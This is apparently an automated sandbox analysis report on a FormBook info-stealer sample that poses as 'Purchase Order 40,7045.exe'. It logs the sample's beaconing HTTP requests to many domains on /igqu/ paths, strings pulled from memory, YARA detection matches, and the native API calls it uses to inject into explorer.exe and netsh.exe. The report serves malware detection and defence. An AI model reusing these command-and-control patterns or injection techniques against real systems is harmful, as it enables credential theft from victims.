Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+ HTTP/1.1Host: www.coveloungewineandwhiskey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.covid19salivatestdirect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.primeworldgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.hyx20140813.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P HTTP/1.1Host: www.obsessingwealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.cashintl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt HTTP/1.1Host: www.namofast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.plantpowered.energyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.capitalcitybombers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ownumo.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Sat, 21 Nov 2020 08:23:14 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: netsh.exe, 00000003.00000002.500404825.000000000419D000.00000004.00000001.sdmp	String found in binary or memory: http://browsehappy.com/
Source: explorer.exe, 00000002.00000000.252788264.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Purchase Order 40,7045.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Purchase Order 40,7045.exe

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417BA0 NtCreateFile,	1_2_00417BA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417C50 NtReadFile,	1_2_00417C50
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417CD0 NtClose,	1_2_00417CD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417D80 NtAllocateVirtualMemory,	1_2_00417D80
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417C4C NtReadFile,	1_2_00417C4C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417CCA NtClose,	1_2_00417CCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01239910
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012399A0 NtCreateSection,LdrInitializeThunk,	1_2_012399A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01239860
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239840 NtDelayExecution,LdrInitializeThunk,	1_2_01239840
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_012398F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A20 NtResumeThread,LdrInitializeThunk,	1_2_01239A20
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01239A00
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A50 NtCreateFile,LdrInitializeThunk,	1_2_01239A50
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239540 NtReadFile,LdrInitializeThunk,	1_2_01239540
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012395D0 NtClose,LdrInitializeThunk,	1_2_012395D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01239710
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_012397A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01239780
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239FE0 NtCreateMutant,LdrInitializeThunk,	1_2_01239FE0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01239660
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_012396E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239950 NtQueueApcThread,	1_2_01239950
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012399D0 NtCreateProcessEx,	1_2_012399D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239820 NtEnumerateKey,	1_2_01239820
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123B040 NtSuspendThread,	1_2_0123B040
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012398A0 NtWriteVirtualMemory,	1_2_012398A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239B00 NtSetValueKey,	1_2_01239B00
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123A3B0 NtGetContextThread,	1_2_0123A3B0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A10 NtQuerySection,	1_2_01239A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A80 NtOpenDirectoryObject,	1_2_01239A80
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239520 NtWaitForSingleObject,	1_2_01239520
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123AD30 NtSetContextThread,	1_2_0123AD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239560 NtWriteFile,	1_2_01239560
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012395F0 NtQueryInformationFile,	1_2_012395F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239730 NtQueryVirtualMemory,	1_2_01239730
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123A710 NtOpenProcessToken,	1_2_0123A710
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239760 NtOpenProcess,	1_2_01239760
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239770 NtSetInformationFile,	1_2_01239770
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123A770 NtOpenThread,	1_2_0123A770
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239610 NtEnumerateValueKey,	1_2_01239610
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239670 NtQueryInformationProcess,	1_2_01239670
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239650 NtQueryValueKey,	1_2_01239650
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012396D0 NtCreateKey,	1_2_012396D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A50 NtCreateFile,LdrInitializeThunk,	3_2_03959A50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039599A0 NtCreateSection,LdrInitializeThunk,	3_2_039599A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_03959910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959840 NtDelayExecution,LdrInitializeThunk,	3_2_03959840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03959860
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959780 NtMapViewOfSection,LdrInitializeThunk,	3_2_03959780
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959FE0 NtCreateMutant,LdrInitializeThunk,	3_2_03959FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959710 NtQueryInformationToken,LdrInitializeThunk,	3_2_03959710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039596D0 NtCreateKey,LdrInitializeThunk,	3_2_039596D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039596E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_039596E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039595D0 NtClose,LdrInitializeThunk,	3_2_039595D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959540 NtReadFile,LdrInitializeThunk,	3_2_03959540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395A3B0 NtGetContextThread,	3_2_0395A3B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959B00 NtSetValueKey,	3_2_03959B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A80 NtOpenDirectoryObject,	3_2_03959A80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A10 NtQuerySection,	3_2_03959A10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A00 NtProtectVirtualMemory,	3_2_03959A00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A20 NtResumeThread,	3_2_03959A20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039599D0 NtCreateProcessEx,	3_2_039599D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959950 NtQueueApcThread,	3_2_03959950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039598A0 NtWriteVirtualMemory,	3_2_039598A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039598F0 NtReadVirtualMemory,	3_2_039598F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959820 NtEnumerateKey,	3_2_03959820
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395B040 NtSuspendThread,	3_2_0395B040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039597A0 NtUnmapViewOfSection,	3_2_039597A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395A710 NtOpenProcessToken,	3_2_0395A710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959730 NtQueryVirtualMemory,	3_2_03959730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395A770 NtOpenThread,	3_2_0395A770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959770 NtSetInformationFile,	3_2_03959770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959760 NtOpenProcess,	3_2_03959760
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959610 NtEnumerateValueKey,	3_2_03959610
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959650 NtQueryValueKey,	3_2_03959650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959670 NtQueryInformationProcess,	3_2_03959670
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959660 NtAllocateVirtualMemory,	3_2_03959660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039595F0 NtQueryInformationFile,	3_2_039595F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395AD30 NtSetContextThread,	3_2_0395AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959520 NtWaitForSingleObject,	3_2_03959520
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959560 NtWriteFile,	3_2_03959560
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7BA0 NtCreateFile,	3_2_02DE7BA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7CD0 NtClose,	3_2_02DE7CD0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7C50 NtReadFile,	3_2_02DE7C50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7CCA NtClose,	3_2_02DE7CCA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7C4C NtReadFile,	3_2_02DE7C4C

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086F895	0_2_0086F895
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876098	0_2_00876098
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876808	0_2_00876808
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087B14E	0_2_0087B14E
